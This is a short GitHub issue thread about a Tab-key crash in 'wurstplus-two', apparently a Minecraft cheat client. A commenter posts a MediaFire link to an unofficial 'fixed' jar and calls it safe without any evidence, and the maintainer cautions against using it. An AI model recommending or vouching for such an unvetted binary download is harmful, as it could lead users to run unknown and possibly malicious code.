### ISSUE TITLE
Crashes

### ISSUE THREAD

**Issue by owowowowowo-png** [TrvsF/wurstplus-two#74]
when i press the "tab button" for minecraft it crashes?

**Comment by DisarmedDrop** [comment]
Use this[](https://www.mediafire.com/file/xubzx3ygaxhysrh/Wurst2FixedTab.jar/file)

**Comment by DisarmedDrop** [comment]
Use this: https://www.mediafire.com/file/xubzx3ygaxhysrh/Wurst2FixedTab.jar/file

**Comment by owowowowowo-png** [comment]
is that safe

**Comment by DisarmedDrop** [comment]
yes

**Comment by TrvsF** [comment]
its a feature, also probably not the best idea to use that
